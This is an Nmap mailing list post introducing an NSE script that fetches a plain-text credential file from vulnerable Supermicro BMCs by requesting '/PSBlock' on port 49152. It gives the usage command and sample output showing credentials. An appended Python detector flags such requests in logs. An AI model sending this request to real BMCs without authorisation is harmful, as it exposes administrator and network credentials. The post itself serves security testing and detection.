Nmap Development mailing list archives

Re: NSE: bmc-supermicro-conf. Attempts to download conf file from vulnerable Supermicro BMC products


From: Paulino Calderon <paulino () calderonpale com>
Date: Sun, 17 Aug 2014 21:18:39 -0500

Hi everyone,

I committed this in r33546 and r33547. The vulnerability got nominated for a Pwnie for Best Server-Side Bug at BH this year and apparently there are still a lot of exposed servers.

Cheers.

On Jun 20, 2014, at 4:47 AM, Paulino Calderon <paulino () calderonpale com> wrote:

Hi list,

I'm attaching an NSE script to detect a serious flaw affecting Supermicro BMCs. It seems the offsets change between products and versions so I left the credential parser out for now.

Cheers.

Download script: 
https://bitbucket.org/cldrn/nmap-nse-scripts/raw/aa043e48b5526253217208d20a8c61c5c967014b/scripts/6.x/bmc-supermicro-conf.nse

description = [[
Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro BMC products.

The script connects to port 49152 and issues a request for "/PSBlock" to download the file. This configuration file contains all users with their passwords in plain text form.

References:
* http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
* https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
]]

---
-- @usage nmap -p49152 --script bmc-supermicro-conf <target>
-- 
-- @output
-- PORT      STATE SERVICE REASON
-- 49152/tcp open  unknown syn-ack
-- | bmc-supermicro-conf: 
-- |   VULNERABLE:
-- |   Supermicro BMC configuration file disclosure
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- |       Some Supermicro BMC products are vulnerable to an authentication bypass vulnerability that allows attackers to download
-- |       a configuration file containing plain text user credentials. These credentials may be used to log in to the administrative interface and the
-- |       network's Active Directory.
-- |     Disclosure date: 2014-06-19
-- |     Extra information:
-- |       Snippet from configuration file:
-- |   .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
-- |   Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
-- |   
-- |     References:
-- |_      http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
--
-- @args bmc-supermicro-conf.out Output file to store configuration file. Default: <ip>_bmc.conf
---
<bmc-supermicro-conf.nse>

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
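The script's own check is a single request for "/PSBlock" on TCP port 49152, which also makes the attempt easy to spot from the network side. The following detector is an added example written for this archive page; it is not part of bmc-supermicro-conf.nse or Nmap. It parses constructed, Zeek-style http log lines (tab-separated fields, as assumed here: ts, src ip, src port, dst ip, dst port, method, uri, status) and raises an alert for every "/PSBlock" request sent to port 49152, ranking a request that the BMC answered with 200 higher than one it refused, and additionally reports sources that hit more than one BMC, which is what a sweep with this script would look like.

```python
"""Flag requests for the Supermicro BMC '/PSBlock' configuration file
(TCP port 49152) in Zeek-style http log lines (added example, not Nmap code)."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

PSBLOCK_PORT = 49152                     # port the BMC web service listens on (from the NSE description)
PSBLOCK_URI_RE = re.compile(r"^/PSBlock(?:[/?#]|$)", re.IGNORECASE)  # "/PSBlock", "/PSBlock?x", not "/PSBlocks"

# Constructed sample log (tab-separated fields, hypothetical format):
# ts  src_ip  src_port  dst_ip  dst_port  method  uri  status
SAMPLE_LOG = (
    "1408320000.100\t10.0.0.5\t51234\t10.0.1.20\t80\tGET\t/\t200\n"
    "1408320001.200\t10.0.0.7\t51300\t10.0.1.21\t49152\tGET\t/PSBlock\t200\n"
    "1408320002.300\t10.0.0.7\t51301\t10.0.1.22\t49152\tGET\t/PSBlock\t404\n"
    "1408320003.400\t10.0.0.9\t51400\t10.0.1.23\t49152\tGET\t/index.html\t200\n"
    "1408320004.500\t10.0.0.7\t51302\t10.0.1.24\t49152\tGET\t/PSBlock\t-\n"   # status missing ("-")
    "garbage line without tabs\n"
)


@dataclass(frozen=True)
class Alert:
    ts: float
    src_ip: str
    dst_ip: str
    status: Optional[int]   # None when the log has no status code
    severity: str           # "high" if the BMC returned 200 (file served), else "medium"


def parse_line(line: str) -> Optional[dict]:
    """Split one log line into typed fields; return None for malformed lines."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 8:
        return None
    ts, src_ip, _src_port, dst_ip, dst_port, method, uri, status = fields
    try:
        return {
            "ts": float(ts),
            "src_ip": src_ip,
            "dst_ip": dst_ip,
            "dst_port": int(dst_port),
            "method": method,
            "uri": uri,
            "status": int(status) if status.isdigit() else None,
        }
    except ValueError:
        return None


def detect_psblock(log_text: str) -> List[Alert]:
    """Return one Alert per request for /PSBlock on the BMC port."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["dst_port"] != PSBLOCK_PORT or not PSBLOCK_URI_RE.search(rec["uri"]):
            continue
        # A 200 means the BMC actually served the credential file; anything
        # else (404, missing status) is still a probe worth investigating.
        severity = "high" if rec["status"] == 200 else "medium"
        alerts.append(Alert(rec["ts"], rec["src_ip"], rec["dst_ip"], rec["status"], severity))
    return alerts


def sweeping_sources(alerts: List[Alert], min_targets: int = 2) -> Dict[str, int]:
    """Sources that requested /PSBlock from at least min_targets distinct BMCs."""
    targets_per_src = Counter()
    seen = set()
    for a in alerts:
        if (a.src_ip, a.dst_ip) not in seen:
            seen.add((a.src_ip, a.dst_ip))
            targets_per_src[a.src_ip] += 1
    return {src: n for src, n in targets_per_src.items() if n >= min_targets}


if __name__ == "__main__":
    found = detect_psblock(SAMPLE_LOG)
    for a in found:
        print(f"{a.severity:6} {a.src_ip} -> {a.dst_ip} status={a.status}")
    print("sweeping sources:", sweeping_sources(found))
```

Run against the constructed log, this yields three alerts (one high for the 200 response, two medium) and identifies 10.0.0.7 as having touched three BMCs. On a real deployment, anchoring the regex on the URI path and the destination port keeps the rule from firing on unrelated 49152 traffic, and the high-severity case is the one that warrants treating the BMC credentials as compromised.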
